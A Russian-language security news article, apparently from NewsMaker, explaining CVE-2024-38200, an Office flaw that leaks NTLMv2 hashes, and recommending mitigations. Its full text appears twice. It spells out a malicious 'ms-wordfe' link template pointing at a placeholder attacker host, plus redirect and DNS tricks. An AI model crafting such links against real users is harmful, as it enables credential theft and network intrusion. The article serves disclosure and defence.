CVE-2024-38200: как Office может раскрыть учётные данные пользователя?
NewsMakerОбычные пользователи рискуют стать невольными помощниками хакеров в проведении взлома.
Недавняя уязвимость в Microsoft Office , получившая идентификатор CVE-2024-38200 и оценку по шкале CVSS 9.1, открывает возможность перехватывать хэши NTLMv2 и потенциально использовать их для атак на корпоративные сети. Мы уже кратко рассказывали о ней в августе, однако теперь, когда все её технические подробности раскрыты, настало время обсудить проблему более углублено.
Хэш NTLMv2 – это данные аутентификации, которые система отправляет для подтверждения личности пользователя. При правильном использовании этого хэша злоумышленники могут получить доступ к защищённым ресурсам и даже повысить свои привилегии в сети.
Основная проблема CVE-2024-38200 связана с URI-схемами Office — специальными ссылками для открытия файлов напрямую из приложений Word, Excel и других. Оказывается, через такую схему можно создать запрос к удалённому серверу и перехватить хэш NTLMv2 жертвы. Для этого нужно отправить пользователю специальную ссылку в формате «ms-wordfe|u|http://<адрес атаки>/leak.docx». При попытке открыть такой файл Office запрашивает удалённый ресурс, приводя к утечке хэша.
Особенно уязвимы версии Microsoft 365 Office и Office 2019, которые позволяют загрузить удалённый файл без предупреждения. Это значительно облегчает перехват хэшей злоумышленниками. В более старых версиях, например, в Office 2016, появляется предупреждение безопасности, усложняя выполнение атаки.
Важная деталь заключается в том, что злоумышленники могут перенаправить запрос на ресурс UNC (универсальный формат пути к файлу в сети) с помощью перенаправления 302. Этот приём позволяет обойти защиту и получить хэш NTLMv2 через SMB или HTTP. Атаку через HTTP проще выполнить и эффективнее использовать для дальнейших атак на серверы контроллера домена.
Успешность атаки во многом зависит от настроек безопасности (GPO) на компьютере жертвы. Так, если включена автоматическая аутентификация в зонах локальной сети или доверенных сайтов, то Office автоматически выполнит вход при открытии такой ссылки, отправив NTLMv2-хэш на сервер злоумышленника. Таким образом, даже обычный пользователь домена может невольно предоставить свои данные аутентификации.
Если же настройки безопасности более строгие, злоумышленники могут создать фальшивую DNS-запись и перенаправить запрос на свой сервер. Это также заставляет систему распознать его как локальный ресурс, после чего хэш снова оказывается в руках злоумышленников.
Для защиты от этой уязвимости рекомендуется обновить приложения Office до актуальных версий, изменить настройки локальной сети, отключив автоматическую аутентификацию, а также активировать дополнительные меры безопасности для LDAP-соединений.
Недавняя уязвимость в Microsoft Office , получившая идентификатор CVE-2024-38200 и оценку по шкале CVSS 9.1, открывает возможность перехватывать хэши NTLMv2 и потенциально использовать их для атак на корпоративные сети. Мы уже кратко рассказывали о ней в августе, однако теперь, когда все её технические подробности раскрыты, настало время обсудить проблему более углублено.
Хэш NTLMv2 – это данные аутентификации, которые система отправляет для подтверждения личности пользователя. При правильном использовании этого хэша злоумышленники могут получить доступ к защищённым ресурсам и даже повысить свои привилегии в сети.
Основная проблема CVE-2024-38200 связана с URI-схемами Office — специальными ссылками для открытия файлов напрямую из приложений Word, Excel и других. Оказывается, через такую схему можно создать запрос к удалённому серверу и перехватить хэш NTLMv2 жертвы. Для этого нужно отправить пользователю специальную ссылку в формате «ms-wordfe|u|http://<адрес атаки>/leak.docx». При попытке открыть такой файл Office запрашивает удалённый ресурс, приводя к утечке хэша.
Особенно уязвимы версии Microsoft 365 Office и Office 2019, которые позволяют загрузить удалённый файл без предупреждения. Это значительно облегчает перехват хэшей злоумышленниками. В более старых версиях, например, в Office 2016, появляется предупреждение безопасности, усложняя выполнение атаки.
Важная деталь заключается в том, что злоумышленники могут перенаправить запрос на ресурс UNC (универсальный формат пути к файлу в сети) с помощью перенаправления 302. Этот приём позволяет обойти защиту и получить хэш NTLMv2 через SMB или HTTP. Атаку через HTTP проще выполнить и эффективнее использовать для дальнейших атак на серверы контроллера домена.
Успешность атаки во многом зависит от настроек безопасности (GPO) на компьютере жертвы. Так, если включена автоматическая аутентификация в зонах локальной сети или доверенных сайтов, то Office автоматически выполнит вход при открытии такой ссылки, отправив NTLMv2-хэш на сервер злоумышленника. Таким образом, даже обычный пользователь домена может невольно предоставить свои данные аутентификации.
Если же настройки безопасности более строгие, злоумышленники могут создать фальшивую DNS-запись и перенаправить запрос на свой сервер. Это также заставляет систему распознать его как локальный ресурс, после чего хэш снова оказывается в руках злоумышленников.
Для защиты от этой уязвимости рекомендуется обновить приложения Office до актуальных версий, изменить настройки локальной сети, отключив автоматическую аутентификацию, а также активировать дополнительные меры безопасности для LDAP-соединений.